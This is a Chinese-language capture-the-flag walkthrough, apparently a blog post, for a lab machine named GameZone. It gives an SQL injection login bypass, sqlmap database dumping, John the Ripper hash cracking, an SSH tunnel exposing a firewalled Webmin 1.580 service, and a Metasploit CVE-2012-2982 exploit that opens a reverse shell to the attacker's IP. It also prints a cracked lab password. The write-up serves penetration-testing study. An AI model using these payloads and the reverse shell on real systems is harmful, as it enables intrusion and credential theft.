(学习侵入这台机器。 了解如何使用 SQLMap、破解一些密码、使用反向 SSH 隧道揭示服务以及将您的权限升级到 root。)
攻击IP:10.10.131.230
本地IP:10.10.59.96
1,通过 SQLi 获取访问权限
如果我们的用户名是 admin,密码是: ' or 1=1 -- - 它会将其插入到查询中并验证我们的会话,现在在 Web 服务器上执行的SQL查询如下: SELECT * FROM users WHERE username = admin AND password := ' or 1=1 -- -,GameZone 数据库中没有管理员用户,使用 ' or 1=1 -- - 作为您的用户名,并将密码留空
2,使用 SQLMap
将 SQLMap 指向游戏评论搜索功能,
首先,我们需要使用BurpSuite拦截对搜索功能发出的请求,
将此请求保存到文本文件中,然后我们可以将其传递到 SQLMap 以使用经过身份验证的用户会话:sqlmap -r request.txt --dbms=mysql --dump(-r 使用您之前保存的拦截请求,--dbms 告诉 SQLMap 它是什么类型的数据库管理系统,--dump 尝试输出整个数据库),
使用 JohnTheRipper 破解密码 ,使用这个程序来破解我们之前获得的哈希值(该程序的工作原理是获取一个单词列表,使用指定的算法对其进行哈希处理,然后将其与您的哈希密码进行比较。 如果两个散列密码相同,则意味着已找到它。 您无法反转哈希值,因此需要通过比较哈希值来完成),安装 JohnTheRipper 后,您可以使用以下参数针对您的哈希运行它:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256(hash.txt 包含您的哈希值列表,--wordlist 是您用来查找 dehashed 值的单词列表,--format 是使用的哈希算法,在我们的例子中,它使用 SHA256 进行哈希处理。 ),有了密码和用户名。
尝试通过 SSH 连接到计算机:ssh agent47@10.10.131.230
3,使用反向 SSH 隧道公开服务
运行以下命令来获取打开的连接列表:
反向 SSH 端口转发指定将远程服务器主机上的给定端口转发到本地端的给定主机和端口。-L 是本地隧道(您 <-- 客户端),如果某个站点被阻止,您可以将流量转发到您拥有的服务器并查看它。例如,如果 imgur 在工作中被阻止,您可以执行 ssh -L 9000:imgur.com:80 user@example.com,转到 您计算机上的 localhost:9000,将使用您的其他服务器加载 imgur 流量。-R 是远程隧道(您 --> 客户),您将流量转发到其他服务器以供其他人查看,与上面的例子类似,但方向相反。
我们将使用一个名为 ss 的工具来调查主机上运行的套接字(sockets),如果我们运行:agent47@gamezone:~$ ss -tulpn,它会告诉我们正在运行哪些套接字连接(-t 显示 TCP 套接字,-u 显示 UDP 套接字,-l 仅显示监听套接字,-p 显示使用套接字的进程,-n 不解析服务名称 ),我们可以看到在端口 10000 上运行的服务被外部的防火墙规则阻止(我们可以从 IPtable 列表中看到这一点),使用 SSH 隧道,我们可以(本地)使其向我们公开端口,从我们的本地计算机运行:ssh -L 10000:127.0.0.1:10000 agent47@10.10.131.230,完成后,在浏览器中输入http://127.0.0.1:10000 ,您就可以访问新公开的网络服务器。
暴露的 CMS 的名称是什么? Webmin 1.580
4,使用 Metasploit 进行权限提升
在exploit-db.com搜索影响Webmin版本1.580的漏洞,CVE-2012-2982,在meterpreter上搜索:search CVE-2012-2982,use 0,为我们的有效负载设置一个反向 shell,set payload cmd/unix/reverse,set rhosts 127.0.0.1,set ssl false,set rport 10000,set username agent47,set password videogamer124,set lhost 10.10.59.96,run运行,返回上一目录命令cd ..
9896
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
